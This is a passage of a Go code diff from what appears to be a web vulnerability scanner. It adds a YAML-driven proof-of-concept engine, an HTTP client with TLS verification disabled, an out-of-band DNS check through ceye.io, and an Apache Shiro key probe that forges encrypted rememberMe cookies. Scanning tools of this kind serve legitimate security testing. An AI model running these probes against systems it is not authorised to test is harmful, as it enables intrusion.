+		for _, j := range nextData {
+			output = append(output, append([]string{j}, base[i]...))
+		}
+	}
+	return
+}
+
+func clustersend(oReq *http.Request, variableMap map[string]interface{}, req *Request, env *cel.Env, rule Rules) (bool, error) {
+	for k1, v1 := range variableMap {
+		_, isMap := v1.(map[string]string)
+		if isMap {
+			continue
+		}
+		value := fmt.Sprintf("%v", v1)
+		for k2, v2 := range rule.Headers {
+			if strings.Contains(v2, "{{"+k1+"}}") {
+				rule.Headers[k2] = strings.ReplaceAll(v2, "{{"+k1+"}}", value)
+			}
+		}
+		rule.Path = strings.ReplaceAll(strings.TrimSpace(rule.Path), "{{"+k1+"}}", value)
+		rule.Body = strings.ReplaceAll(strings.TrimSpace(rule.Body), "{{"+k1+"}}", value)
+	}
+	if oReq.URL.Path != "" && oReq.URL.Path != "/" {
+		req.Url.Path = fmt.Sprint(oReq.URL.Path, rule.Path)
+	} else {
+		req.Url.Path = rule.Path
+	}
+	// 某些poc没有区分path和query，需要处理
+	req.Url.Path = strings.ReplaceAll(req.Url.Path, " ", "%20")
+	//req.Url.Path = strings.ReplaceAll(req.Url.Path, "+", "%20")
+	//
+	newRequest, err := http.NewRequest(rule.Method, fmt.Sprintf("%s://%s%s", req.Url.Scheme, req.Url.Host, req.Url.Path), strings.NewReader(rule.Body))
+	if err != nil {
+		//fmt.Println("[-] newRequest error:",err)
+		return false, err
+	}
+	newRequest.Header = oReq.Header.Clone()
+	for k, v := range rule.Headers {
+		newRequest.Header.Set(k, v)
+	}
+	resp, err := DoRequest(newRequest, rule.FollowRedirects)
+	newRequest = nil
+	if err != nil {
+		return false, err
+	}
+	variableMap["response"] = resp
+	// 先判断响应页面是否匹配search规则
+	if rule.Search != "" {
+		result := doSearch(strings.TrimSpace(rule.Search), string(resp.Body))
+		if result != nil && len(result) > 0 { // 正则匹配成功
+			for k, v := range result {
+				variableMap[k] = v
+			}
+			//return false, nil
+		} else {
+			return false, nil
+		}
+	}
+	out, err := Evaluate(env, rule.Expression, variableMap)
+	if err != nil {
+		if strings.Contains(err.Error(), "Syntax error") {
+			fmt.Println(rule.Expression, err)
+		}
+		return false, err
+	}
+	//fmt.Println(fmt.Sprintf("%v, %s", out, out.Type().TypeName()))
+	if fmt.Sprintf("%v", out) == "false" { //如果false不继续执行后续rule
+		return false, err // 如果最后一步执行失败，就算前面成功了最终依旧是失败
+	}
+	return true, err
+}
+
+func cloneRules(tags Rules) Rules {
+	cloneTags := Rules{}
+	cloneTags.Method = tags.Method
+	cloneTags.Path = tags.Path
+	cloneTags.Body = tags.Body
+	cloneTags.Search = tags.Search
+	cloneTags.FollowRedirects = tags.FollowRedirects
+	cloneTags.Expression = tags.Expression
+	cloneTags.Headers = cloneMap(tags.Headers)
+	return cloneTags
+}
+
+func cloneMap(tags map[string]string) map[string]string {
+	cloneTags := make(map[string]string)
+	for k, v := range tags {
+		cloneTags[k] = v
+	}
+	return cloneTags
+}
+
+func evalset(env *cel.Env, variableMap map[string]interface{}, k string, expression string) (err error, output string) {
+	out, err := Evaluate(env, expression, variableMap)
+	if err != nil {
+		variableMap[k] = expression
+	} else {
+		switch value := out.Value().(type) {
+		case *UrlType:
+			variableMap[k] = UrlTypeToString(value)
+		case int64:
+			variableMap[k] = int(value)
+		default:
+			variableMap[k] = fmt.Sprintf("%v", out)
+		}
+	}
+	return err, fmt.Sprintf("%v", variableMap[k])
+}
+
+func evalset1(env *cel.Env, variableMap map[string]interface{}, k string, expression string) (err error, output string) {
+	out, err := Evaluate(env, expression, variableMap)
+	if err != nil {
+		variableMap[k] = expression
+	} else {
+		variableMap[k] = fmt.Sprintf("%v", out)
+	}
+	return err, fmt.Sprintf("%v", variableMap[k])
+}
+
+func CheckInfoPoc(infostr string) string {
+	for _, poc := range info.PocDatas {
+		if strings.Compare(poc.Name, infostr) == 0 {
+			return poc.Alias
+		}
+	}
+	return ""
+}
--- a/WebScan/lib/client.go
+++ b/WebScan/lib/client.go
@@ -0,0 +1,88 @@
+package lib
+
+import (
+	"context"
+	"crypto/tls"
+	"errors"
+	"github.com/shadow1ng/fscan/common"
+	"golang.org/x/net/proxy"
+	"log"
+	"net"
+	"net/http"
+	"net/url"
+	"strings"
+	"time"
+)
+
+var (
+	Client           *http.Client
+	ClientNoRedirect *http.Client
+	dialTimout       = 5 * time.Second
+	keepAlive        = 5 * time.Second
+)
+
+func Inithttp(PocInfo common.PocInfo) {
+	//PocInfo.Proxy = "http://127.0.0.1:8080"
+	err := InitHttpClient(common.PocNum, common.Proxy, time.Duration(common.WebTimeout)*time.Second)
+	if err != nil {
+		log.Fatal(err)
+	}
+}
+
+func InitHttpClient(ThreadsNum int, DownProxy string, Timeout time.Duration) error {
+	type DialContext = func(ctx context.Context, network, addr string) (net.Conn, error)
+	dialer := &net.Dialer{
+		Timeout:   dialTimout,
+		KeepAlive: keepAlive,
+	}
+
+	tr := &http.Transport{
+		DialContext:         dialer.DialContext,
+		MaxConnsPerHost:     5,
+		MaxIdleConns:        0,
+		MaxIdleConnsPerHost: ThreadsNum * 2,
+		IdleConnTimeout:     keepAlive,
+		TLSClientConfig:     &tls.Config{InsecureSkipVerify: true},
+		TLSHandshakeTimeout: 5 * time.Second,
+		DisableKeepAlives:   false,
+	}
+
+	if common.Socks5Proxy != "" {
+		dialSocksProxy, err := common.Socks5Dailer(dialer)
+		if err != nil {
+			return err
+		}
+		if contextDialer, ok := dialSocksProxy.(proxy.ContextDialer); ok {
+			tr.DialContext = contextDialer.DialContext
+		} else {
+			return errors.New("Failed type assertion to DialContext")
+		}
+	} else if DownProxy != "" {
+		if DownProxy == "1" {
+			DownProxy = "http://127.0.0.1:8080"
+		} else if DownProxy == "2" {
+			DownProxy = "socks5://127.0.0.1:1080"
+		} else if !strings.Contains(DownProxy, "://") {
+			DownProxy = "http://127.0.0.1:" + DownProxy
+		}
+		if !strings.HasPrefix(DownProxy, "socks") && !strings.HasPrefix(DownProxy, "http") {
+			return errors.New("no support this proxy")
+		}
+		u, err := url.Parse(DownProxy)
+		if err != nil {
+			return err
+		}
+		tr.Proxy = http.ProxyURL(u)
+	}
+
+	Client = &http.Client{
+		Transport: tr,
+		Timeout:   Timeout,
+	}
+	ClientNoRedirect = &http.Client{
+		Transport:     tr,
+		Timeout:       Timeout,
+		CheckRedirect: func(req *http.Request, via []*http.Request) error { return http.ErrUseLastResponse },
+	}
+	return nil
+}
--- a/WebScan/lib/eval.go
+++ b/WebScan/lib/eval.go
@@ -2,8 +2,10 @@ package lib

 import (
 	"bytes"
+	"compress/gzip"
 	"crypto/md5"
 	"encoding/base64"
+	"encoding/hex"
 	"fmt"
 	"github.com/google/cel-go/cel"
 	"github.com/google/cel-go/checker/decls"
@@ -11,10 +13,13 @@ import (
 	"github.com/google/cel-go/common/types/ref"
 	"github.com/google/cel-go/interpreter/functions"
 	exprpb "google.golang.org/genproto/googleapis/api/expr/v1alpha1"
+	"io"
+	"io/ioutil"
 	"math/rand"
 	"net/http"
 	"net/url"
 	"regexp"
+	"strconv"
 	"strings"
 	"time"
 )
@@ -26,19 +31,19 @@ func NewEnv(c *CustomLib) (*cel.Env, error) {
 func Evaluate(env *cel.Env, expression string, params map[string]interface{}) (ref.Val, error) {
 	ast, iss := env.Compile(expression)
 	if iss.Err() != nil {
-		//fmt.Println("compile: ", iss.Err())
+		//fmt.Printf("compile: ", iss.Err())
 		return nil, iss.Err()
 	}

 	prg, err := env.Program(ast)
 	if err != nil {
-		//fmt.Println("Program creation error: %v", err)
+		//fmt.Printf("Program creation error: %v", err)
 		return nil, err
 	}

 	out, _, err := prg.Eval(params)
 	if err != nil {
-		//fmt.Println("Evaluation error: %v", err)
+		//fmt.Printf("Evaluation error: %v", err)
 		return nil, err
 	}
 	return out, nil
@@ -123,6 +128,10 @@ func NewEnvOption() CustomLib {
 				decls.NewOverload("randomLowercase_int",
 					[]*exprpb.Type{decls.Int},
 					decls.String)),
+			decls.NewFunction("randomUppercase",
+				decls.NewOverload("randomUppercase_int",
+					[]*exprpb.Type{decls.Int},
+					decls.String)),
 			decls.NewFunction("base64",
 				decls.NewOverload("base64_string",
 					[]*exprpb.Type{decls.String},
@@ -167,6 +176,26 @@ func NewEnvOption() CustomLib {
 				decls.NewInstanceOverload("icontains_string",
 					[]*exprpb.Type{decls.String, decls.String},
 					decls.Bool)),
+			decls.NewFunction("TDdate",
+				decls.NewOverload("tongda_date",
+					[]*exprpb.Type{},
+					decls.String)),
+			decls.NewFunction("shirokey",
+				decls.NewOverload("shiro_key",
+					[]*exprpb.Type{decls.String, decls.String},
+					decls.String)),
+			decls.NewFunction("startsWith",
+				decls.NewInstanceOverload("startsWith_bytes",
+					[]*exprpb.Type{decls.Bytes, decls.Bytes},
+					decls.Bool)),
+			decls.NewFunction("istartsWith",
+				decls.NewInstanceOverload("startsWith_string",
+					[]*exprpb.Type{decls.String, decls.String},
+					decls.Bool)),
+			decls.NewFunction("hexdecode",
+				decls.NewInstanceOverload("hexdecode",
+					[]*exprpb.Type{decls.String},
+					decls.Bytes)),
 		),
 	}
 	c.programOptions = []cel.ProgramOption{
@@ -186,7 +215,7 @@ func NewEnvOption() CustomLib {
 				},
 			},
 			&functions.Overload{
-				Operator: "string_bmatch_bytes",
+				Operator: "string_bmatches_bytes",
 				Binary: func(lhs ref.Val, rhs ref.Val) ref.Val {
 					v1, ok := lhs.(types.String)
 					if !ok {
@@ -238,6 +267,16 @@ func NewEnvOption() CustomLib {
 					return types.String(randomLowercase(int(n)))
 				},
 			},
+			&functions.Overload{
+				Operator: "randomUppercase_int",
+				Unary: func(value ref.Val) ref.Val {
+					n, ok := value.(types.Int)
+					if !ok {
+						return types.ValOrErr(value, "unexpected type '%v' passed to randomUppercase", value.Type())
+					}
+					return types.String(randomUppercase(int(n)))
+				},
+			},
 			&functions.Overload{
 				Operator: "base64_string",
 				Unary: func(value ref.Val) ref.Val {
@@ -389,6 +428,75 @@ func NewEnvOption() CustomLib {
 					return types.Bool(strings.Contains(strings.ToLower(string(v1)), strings.ToLower(string(v2))))
 				},
 			},
+			&functions.Overload{
+				Operator: "tongda_date",
+				Function: func(value ...ref.Val) ref.Val {
+					return types.String(time.Now().Format("0601"))
+				},
+			},
+			&functions.Overload{
+				Operator: "shiro_key",
+				Binary: func(key ref.Val, mode ref.Val) ref.Val {
+					v1, ok := key.(types.String)
+					if !ok {
+						return types.ValOrErr(key, "unexpected type '%v' passed to shiro_key", key.Type())
+					}
+					v2, ok := mode.(types.String)
+					if !ok {
+						return types.ValOrErr(mode, "unexpected type '%v' passed to shiro_mode", mode.Type())
+					}
+					cookie := GetShrioCookie(string(v1), string(v2))
+					if cookie == "" {
+						return types.NewErr("%v", "key b64decode failed")
+					}
+					return types.String(cookie)
+				},
+			},
+			&functions.Overload{
+				Operator: "startsWith_bytes",
+				Binary: func(lhs ref.Val, rhs ref.Val) ref.Val {
+					v1, ok := lhs.(types.Bytes)
+					if !ok {
+						return types.ValOrErr(lhs, "unexpected type '%v' passed to startsWith_bytes", lhs.Type())
+					}
+					v2, ok := rhs.(types.Bytes)
+					if !ok {
+						return types.ValOrErr(rhs, "unexpected type '%v' passed to startsWith_bytes", rhs.Type())
+					}
+					// 不区分大小写包含
+					return types.Bool(bytes.HasPrefix(v1, v2))
+				},
+			},
+			&functions.Overload{
+				Operator: "startsWith_string",
+				Binary: func(lhs ref.Val, rhs ref.Val) ref.Val {
+					v1, ok := lhs.(types.String)
+					if !ok {
+						return types.ValOrErr(lhs, "unexpected type '%v' passed to startsWith_string", lhs.Type())
+					}
+					v2, ok := rhs.(types.String)
+					if !ok {
+						return types.ValOrErr(rhs, "unexpected type '%v' passed to startsWith_string", rhs.Type())
+					}
+					// 不区分大小写包含
+					return types.Bool(strings.HasPrefix(strings.ToLower(string(v1)), strings.ToLower(string(v2))))
+				},
+			},
+			&functions.Overload{
+				Operator: "hexdecode",
+				Unary: func(lhs ref.Val) ref.Val {
+					v1, ok := lhs.(types.String)
+					if !ok {
+						return types.ValOrErr(lhs, "unexpected type '%v' passed to hexdecode", lhs.Type())
+					}
+					out, err := hex.DecodeString(string(v1))
+					if err != nil {
+						return types.ValOrErr(lhs, "hexdecode error: %v", err)
+					}
+					// 不区分大小写包含
+					return types.Bytes(out)
+				},
+			},
 		),
 	}
 	return c
@@ -403,8 +511,9 @@ func (c *CustomLib) ProgramOptions() []cel.ProgramOption {
 	return c.programOptions
 }

-func (c *CustomLib) UpdateCompileOptions(args map[string]string) {
-	for k, v := range args {
+func (c *CustomLib) UpdateCompileOptions(args StrMap) {
+	for _, item := range args {
+		k, v := item.Key, item.Value
 		// 在执行之前是不知道变量的类型的，所以统一声明为字符型
 		// 所以randomInt虽然返回的是int型，在运算中却被当作字符型进行计算，需要重载string_*_string
 		var d *exprpb.Decl
@@ -419,9 +528,15 @@ func (c *CustomLib) UpdateCompileOptions(args map[string]string) {
 	}
 }

+var randSource = rand.New(rand.NewSource(time.Now().Unix()))
+
 func randomLowercase(n int) string {
 	lowercase := "abcdefghijklmnopqrstuvwxyz"
-	randSource := rand.New(rand.NewSource(time.Now().Unix()))
+	return RandomStr(randSource, lowercase, n)
+}
+
+func randomUppercase(n int) string {
+	lowercase := "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
 	return RandomStr(randSource, lowercase, n)
 }

@@ -432,7 +547,7 @@ func reverseCheck(r *Reverse, timeout int64) bool {
 	time.Sleep(time.Second * time.Duration(timeout))
 	sub := strings.Split(r.Domain, ".")[0]
 	urlStr := fmt.Sprintf("http://api.ceye.io/v1/records?token=%s&type=dns&filter=%s", ceyeApi, sub)
-	fmt.Println(urlStr)
+	//fmt.Println(urlStr)
 	req, _ := http.NewRequest("GET", urlStr, nil)
 	resp, err := DoRequest(req, false)
 	if err != nil {
@@ -445,7 +560,6 @@ func reverseCheck(r *Reverse, timeout int64) bool {
 	return false
 }

-
 func RandomStr(randSource *rand.Rand, letterBytes string, n int) string {
 	const (
 		letterIdxBits = 6                    // 6 bits to represent a letter index
@@ -467,3 +581,115 @@ func RandomStr(randSource *rand.Rand, letterBytes string, n int) string {
 	}
 	return string(randBytes)
 }
+
+func DoRequest(req *http.Request, redirect bool) (*Response, error) {
+	if req.Body == nil || req.Body == http.NoBody {
+	} else {
+		req.Header.Set("Content-Length", strconv.Itoa(int(req.ContentLength)))
+		if req.Header.Get("Content-Type") == "" {
+			req.Header.Set("Content-Type", "application/x-www-form-urlencoded")
+		}
+	}
+
+	var oResp *http.Response
+	var err error
+	if redirect {
+		oResp, err = Client.Do(req)
+	} else {
+		oResp, err = ClientNoRedirect.Do(req)
+	}
+	if err != nil {
+		//fmt.Println("[-]DoRequest error: ",err)
+		return nil, err
+	}
+	defer oResp.Body.Close()
+	resp, err := ParseResponse(oResp)
+	if err != nil {
+		common.LogError("[-]ParseResponse error: " + err.Error())
+		return nil, err
+	}
+	return resp, err
+}
+
+func ParseUrl(u *url.URL) *UrlType {
+	nu := &UrlType{}
+	nu.Scheme = u.Scheme
+	nu.Domain = u.Hostname()
+	nu.Host = u.Host
+	nu.Port = u.Port()
+	nu.Path = u.EscapedPath()
+	nu.Query = u.RawQuery
+	nu.Fragment = u.Fragment
+	return nu
+}
+
+func ParseRequest(oReq *http.Request) (*Request, error) {
+	req := &Request{}
+	req.Method = oReq.Method
+	req.Url = ParseUrl(oReq.URL)
+	header := make(map[string]string)
+	for k := range oReq.Header {
+		header[k] = oReq.Header.Get(k)
+	}
+	req.Headers = header
+	req.ContentType = oReq.Header.Get("Content-Type")
+	if oReq.Body == nil || oReq.Body == http.NoBody {
+	} else {
+		data, err := ioutil.ReadAll(oReq.Body)
+		if err != nil {
+			return nil, err
+		}
+		req.Body = data
+		oReq.Body = ioutil.NopCloser(bytes.NewBuffer(data))
+	}
+	return req, nil
+}
+
+func ParseResponse(oResp *http.Response) (*Response, error) {
+	var resp Response
+	header := make(map[string]string)
+	resp.Status = int32(oResp.StatusCode)
+	resp.Url = ParseUrl(oResp.Request.URL)
+	for k := range oResp.Header {
+		header[k] = strings.Join(oResp.Header.Values(k), ";")
+	}
+	resp.Headers = header
+	resp.ContentType = oResp.Header.Get("Content-Type")
+	body, err := getRespBody(oResp)
+	if err != nil {
+		return nil, err
+	}
+	resp.Body = body
+	return &resp, nil
+}
+
+func getRespBody(oResp *http.Response) ([]byte, error) {
+	var body []byte
+	if oResp.Header.Get("Content-Encoding") == "gzip" {
+		gr, err := gzip.NewReader(oResp.Body)
+		if err != nil {
+			return nil, err
+		}
+		defer gr.Close()
+		for {
+			buf := make([]byte, 1024)
+			n, err := gr.Read(buf)
+			if err != nil && err != io.EOF {
+				//utils.Logger.Error(err)
+				return nil, err
+			}
+			if n == 0 {
+				break
+			}
+			body = append(body, buf...)
+		}
+	} else {
+		raw, err := ioutil.ReadAll(io.LimitReader(oResp.Body, 10240))
+		if err != nil {
+			return nil, err
+		}
+		defer oResp.Body.Close()
+		body = raw
+	}
+	return body, nil
+}
--- a/WebScan/lib/http.go
+++ b/WebScan/lib/http.go
@@ -1,171 +0,0 @@
-package lib
-
-import (
-	"bytes"
-	"compress/gzip"
-	"crypto/tls"
-	"io"
-	"io/ioutil"
-	"net"
-	"net/http"
-	"net/url"
-	"strconv"
-	"time"
-)
-
-var (
-	client           *http.Client
-	clientNoRedirect *http.Client
-	dialTimout       = 5 * time.Second
-	keepAlive        = 15 * time.Second
-)
-
-func InitHttpClient(ThreadsNum int, DownProxy string, Timeout time.Duration) error {
-	dialer := &net.Dialer{
-		Timeout:   dialTimout,
-		KeepAlive: keepAlive,
-	}
-
-	tr := &http.Transport{
-		DialContext: dialer.DialContext,
-		//MaxConnsPerHost:     0,
-		MaxIdleConns:        1000,
-		MaxIdleConnsPerHost: ThreadsNum * 2,
-		IdleConnTimeout:     keepAlive,
-		TLSClientConfig:     &tls.Config{InsecureSkipVerify: true},
-		TLSHandshakeTimeout: 5 * time.Second,
-		DisableKeepAlives:   false,
-	}
-	if DownProxy != "" {
-		u, err := url.Parse(DownProxy)
-		if err != nil {
-			return err
-		}
-		tr.Proxy = http.ProxyURL(u)
-	}
-
-	client = &http.Client{
-		Transport: tr,
-		Timeout:   Timeout,
-	}
-	clientNoRedirect = &http.Client{
-		Transport: tr,
-		Timeout:   Timeout,
-	}
-	clientNoRedirect.CheckRedirect = func(req *http.Request, via []*http.Request) error {
-		return http.ErrUseLastResponse
-	}
-	return nil
-}
-
-func DoRequest(req *http.Request, redirect bool) (*Response, error) {
-	if req.Body == nil || req.Body == http.NoBody {
-	} else {
-		req.Header.Set("Content-Length", strconv.Itoa(int(req.ContentLength)))
-		if req.Header.Get("Content-Type") == "" {
-			req.Header.Set("Content-Type", "application/x-www-form-urlencoded")
-		}
-	}
-
-	var oResp *http.Response
-	var err error
-	if redirect {
-		oResp, err = client.Do(req)
-	} else {
-		oResp, err = clientNoRedirect.Do(req)
-	}
-	if err != nil {
-		return nil, err
-	}
-	defer oResp.Body.Close()
-	resp, err := ParseResponse(oResp)
-	if err != nil {
-		return nil, err
-	}
-	return resp, err
-}
-
-func ParseUrl(u *url.URL) *UrlType {
-	nu := &UrlType{}
-	nu.Scheme = u.Scheme
-	nu.Domain = u.Hostname()
-	nu.Host = u.Host
-	nu.Port = u.Port()
-	nu.Path = u.EscapedPath()
-	nu.Query = u.RawQuery
-	nu.Fragment = u.Fragment
-	return nu
-}
-
-func ParseRequest(oReq *http.Request) (*Request, error) {
-	req := &Request{}
-	req.Method = oReq.Method
-	req.Url = ParseUrl(oReq.URL)
-	header := make(map[string]string)
-	for k := range oReq.Header {
-		header[k] = oReq.Header.Get(k)
-	}
-	req.Headers = header
-	req.ContentType = oReq.Header.Get("Content-Type")
-	if oReq.Body == nil || oReq.Body == http.NoBody {
-	} else {
-		data, err := ioutil.ReadAll(oReq.Body)
-		if err != nil {
-			return nil, err
-		}
-		req.Body = data
-		oReq.Body = ioutil.NopCloser(bytes.NewBuffer(data))
-	}
-	return req, nil
-}
-
-func ParseResponse(oResp *http.Response) (*Response, error) {
-	var resp Response
-	header := make(map[string]string)
-	resp.Status = int32(oResp.StatusCode)
-	resp.Url = ParseUrl(oResp.Request.URL)
-	for k := range oResp.Header {
-		header[k] = oResp.Header.Get(k)
-	}
-	resp.Headers = header
-	resp.ContentType = oResp.Header.Get("Content-Type")
-	body, err := getRespBody(oResp)
-	if err != nil {
-		return nil, err
-	}
-	resp.Body = body
-	return &resp, nil
-}
-
-func getRespBody(oResp *http.Response) ([]byte, error) {
-	var body []byte
-	if oResp.Header.Get("Content-Encoding") == "gzip" {
-		gr, err := gzip.NewReader(oResp.Body)
-		if err != nil {
-			return nil, err
-		}
-
-		defer gr.Close()
-		for {
-			buf := make([]byte, 1024)
-			n, err := gr.Read(buf)
-			if err != nil && err != io.EOF {
-				//utils.Logger.Error(err)
-				return nil, err
-			}
-			if n == 0 {
-				break
-			}
-			body = append(body, buf...)
-		}
-	} else {
-		raw, err := ioutil.ReadAll(oResp.Body)
-		if err != nil {
-			//utils.Logger.Error(err)
-			return nil, err
-		}
-		defer oResp.Body.Close()
-		body = raw
-	}
-	return body, nil
-}
--- a/WebScan/lib/http.pb.go
+++ b/WebScan/lib/http.pb.go
@@ -4,11 +4,121 @@
 package lib

 import (
-	fmt "fmt"
-	proto "github.com/golang/protobuf/proto"
-	math "math"
+	"embed"
+	"fmt"
+	"github.com/golang/protobuf/proto"
+	"gopkg.in/yaml.v2"
+	"io/ioutil"
+	"math"
+	"strings"
 )

+type Poc struct {
+	Name   string  `yaml:"name"`
+	Set    StrMap  `yaml:"set"`
+	Sets   ListMap `yaml:"sets"`
+	Rules  []Rules `yaml:"rules"`
+	Groups RuleMap `yaml:"groups"`
+	Detail Detail  `yaml:"detail"`
+}
+
+type MapSlice = yaml.MapSlice
+
+type StrMap []StrItem
+type ListMap []ListItem
+type RuleMap []RuleItem
+
+type StrItem struct {
+	Key, Value string
+}
+
+type ListItem struct {
+	Key   string
+	Value []string
+}
+
+type RuleItem struct {
+	Key   string
+	Value []Rules
+}
+
+func (r *StrMap) UnmarshalYAML(unmarshal func(interface{}) error) error {
+	var tmp yaml.MapSlice
+	if err := unmarshal(&tmp); err != nil {
+		return err
+	}
+	for _, one := range tmp {
+		key, value := one.Key.(string), one.Value.(string)
+		*r = append(*r, StrItem{key, value})
+	}
+	return nil
+}
+
+//func (r *RuleItem) UnmarshalYAML(unmarshal func(interface{}) error) error {
+//	var tmp yaml.MapSlice
+//	if err := unmarshal(&tmp); err != nil {
+//		return err
+//	}
+//	//for _,one := range tmp{
+//	//	key,value := one.Key.(string),one.Value.(string)
+//	//	*r = append(*r,StrItem{key,value})
+//	//}
+//	return nil
+//}
+
+func (r *RuleMap) UnmarshalYAML(unmarshal func(interface{}) error) error {
+	var tmp1 yaml.MapSlice
+	if err := unmarshal(&tmp1); err != nil {
+		return err
+	}
+	var tmp = make(map[string][]Rules)
+	if err := unmarshal(&tmp); err != nil {
+		return err
+	}
+
+	for _, one := range tmp1 {
+		key := one.Key.(string)
+		value := tmp[key]
+		*r = append(*r, RuleItem{key, value})
+	}
+	return nil
+}
+
+func (r *ListMap) UnmarshalYAML(unmarshal func(interface{}) error) error {
+	var tmp yaml.MapSlice
+	if err := unmarshal(&tmp); err != nil {
+		return err
+	}
+	for _, one := range tmp {
+		key := one.Key.(string)
+		var value []string
+		for _, val := range one.Value.([]interface{}) {
+			v := fmt.Sprintf("%v", val)
+			value = append(value, v)
+		}
+		*r = append(*r, ListItem{key, value})
+	}
+	return nil
+}
+
+type Rules struct {
+	Method          string            `yaml:"method"`
+	Path            string            `yaml:"path"`
+	Headers         map[string]string `yaml:"headers"`
+	Body            string            `yaml:"body"`
+	Search          string            `yaml:"search"`
+	FollowRedirects bool              `yaml:"follow_redirects"`
+	Expression      string            `yaml:"expression"`
+	Continue        bool              `yaml:"continue"`
+}
+
+type Detail struct {
+	Author      string   `yaml:"author"`
+	Links       []string `yaml:"links"`
+	Description string   `yaml:"description"`
+	Version     string   `yaml:"version"`
+}
+
 // Reference imports to suppress errors if they are not otherwise used.
 var _ = proto.Marshal
 var _ = fmt.Errorf
@@ -352,3 +462,60 @@ var fileDescriptor_11b04836674e6f94 = []byte{
 	0x0d, 0x67, 0xef, 0xf5, 0x80, 0x1f, 0x38, 0xa9, 0x37, 0xfc, 0x5b, 0xdc, 0xfe, 0x0a, 0x00, 0x00,
 	0xff, 0xff, 0x2a, 0xe0, 0x6d, 0x45, 0x24, 0x03, 0x00, 0x00,
 }
+
+func LoadMultiPoc(Pocs embed.FS, pocname string) []*Poc {
+	var pocs []*Poc
+	for _, f := range SelectPoc(Pocs, pocname) {
+		if p, err := LoadPoc(f, Pocs); err == nil {
+			pocs = append(pocs, p)
+		} else {
+			fmt.Println("[-] load poc ", f, " error:", err)
+		}
+	}
+	return pocs
+}
+
+func LoadPoc(fileName string, Pocs embed.FS) (*Poc, error) {
+	p := &Poc{}
+	yamlFile, err := Pocs.ReadFile("pocs/" + fileName)
+
+	if err != nil {
+		fmt.Printf("[-] load poc %s error1: %v\n", fileName, err)
+		return nil, err
+	}
+	err = yaml.Unmarshal(yamlFile, p)
+	if err != nil {
+		fmt.Printf("[-] load poc %s error2: %v\n", fileName, err)
+		return nil, err
+	}
+	return p, err
+}
+
+func SelectPoc(Pocs embed.FS, pocname string) []string {
+	entries, err := Pocs.ReadDir("pocs")
+	if err != nil {
+		fmt.Println(err)
+	}
+	var foundFiles []string
+	for _, entry := range entries {
+		if strings.Contains(entry.Name(), pocname) {
+			foundFiles = append(foundFiles, entry.Name())
+		}
+	}
+	return foundFiles
+}
+
+func LoadPocbyPath(fileName string) (*Poc, error) {
+	p := &Poc{}
+	data, err := ioutil.ReadFile(fileName)
+	if err != nil {
+		fmt.Printf("[-] load poc %s error3: %v\n", fileName, err)
+		return nil, err
+	}
+	err = yaml.Unmarshal(data, p)
+	if err != nil {
+		fmt.Printf("[-] load poc %s error4: %v\n", fileName, err)
+		return nil, err
+	}
+	return p, err
+}
--- a/WebScan/lib/poc.go
+++ b/WebScan/lib/poc.go
@@ -1,70 +0,0 @@
-package lib
-
-import (
-	"embed"
-	"fmt"
-	"gopkg.in/yaml.v3"
-	"strings"
-)
-
-type Poc struct {
-	Name   string            `yaml:"name"`
-	Set    map[string]string `yaml:"set"`
-	Rules  []Rules           `yaml:"rules"`
-	Detail Detail            `yaml:"detail"`
-}
-
-type Rules struct {
-	Method          string            `yaml:"method"`
-	Path            string            `yaml:"path"`
-	Headers         map[string]string `yaml:"headers"`
-	Body            string            `yaml:"body"`
-	Search          string            `yaml:"search"`
-	FollowRedirects bool              `yaml:"follow_redirects"`
-	Expression      string            `yaml:"expression"`
-}
-
-type Detail struct {
-	Author      string   `yaml:"author"`
-	Links       []string `yaml:"links"`
-	Description string   `yaml:"description"`
-	Version     string   `yaml:"version"`
-}
-
-func LoadMultiPoc(Pocs embed.FS, pocname string) []*Poc {
-	var pocs []*Poc
-	for _, f := range SelectPoc(Pocs, pocname) {
-		if p, err := loadPoc(f, Pocs); err == nil {
-			pocs = append(pocs, p)
-		}
-	}
-	return pocs
-}
-
-func loadPoc(fileName string, Pocs embed.FS) (*Poc, error) {
-	p := &Poc{}
-	yamlFile, err := Pocs.ReadFile("pocs/" + fileName)
-
-	if err != nil {
-		return nil, err
-	}
-	err = yaml.Unmarshal(yamlFile, p)
-	if err != nil {
-		return nil, err
-	}
-	return p, err
-}
-
-func SelectPoc(Pocs embed.FS, pocname string) []string {
-	entries, err := Pocs.ReadDir("pocs")
-	if err != nil {
-		fmt.Println(err)
-	}
-	var foundFiles []string
-	for _, entry := range entries {
-		if strings.Contains(entry.Name(), pocname) {
-			foundFiles = append(foundFiles, entry.Name())
-		}
-	}
-	return foundFiles
-}
--- a/WebScan/lib/shiro.go
+++ b/WebScan/lib/shiro.go
@@ -0,0 +1,73 @@
+package lib
+
+import (
+	"bytes"
+	"crypto/aes"
+	"crypto/cipher"
+	"crypto/rand"
+	"encoding/base64"
+	"io"
+
+	uuid "github.com/satori/go.uuid"
+)
+
+var (
+	CheckContent = "rO0ABXNyADJvcmcuYXBhY2hlLnNoaXJvLnN1YmplY3QuU2ltcGxlUHJpbmNpcGFsQ29sbGVjdGlvbqh/WCXGowhKAwABTAAPcmVhbG1QcmluY2lwYWxzdAAPTGphdmEvdXRpbC9NYXA7eHBwdwEAeA=="
+	Content, _   = base64.StdEncoding.DecodeString(CheckContent)
+)
+
+func Padding(plainText []byte, blockSize int) []byte {
+	//计算要填充的长度
+	n := (blockSize - len(plainText)%blockSize)
+	//对原来的明文填充n个n
+	temp := bytes.Repeat([]byte{byte(n)}, n)
+	plainText = append(plainText, temp...)
+	return plainText
+}
+
+func GetShrioCookie(key, mode string) string {
+	if mode == "gcm" {
+		return AES_GCM_Encrypt(key)
+	} else {
+		//cbc
+		return AES_CBC_Encrypt(key)
+	}
+}
+
+//AES CBC加密后的payload
+func AES_CBC_Encrypt(shirokey string) string {
+	key, err := base64.StdEncoding.DecodeString(shirokey)
+	if err != nil {
+		return ""
+	}
+	block, err := aes.NewCipher(key)
+	if err != nil {
+		return ""
+	}
+	Content = Padding(Content, block.BlockSize())
+	iv := uuid.NewV4().Bytes()                     //指定初始向量vi,长度和block的块尺寸一致
+	blockMode := cipher.NewCBCEncrypter(block, iv) //指定CBC分组模式，返回一个BlockMode接口对象
+	cipherText := make([]byte, len(Content))
+	blockMode.CryptBlocks(cipherText, Content) //加密数据
+	return base64.StdEncoding.EncodeToString(append(iv[:], cipherText[:]...))
+}
+
+//AES GCM 加密后的payload shiro 1.4.2版本更换为了AES-GCM加密方式
+func AES_GCM_Encrypt(shirokey string) string {
+	key, err := base64.StdEncoding.DecodeString(shirokey)
+	if err != nil {
+		return ""
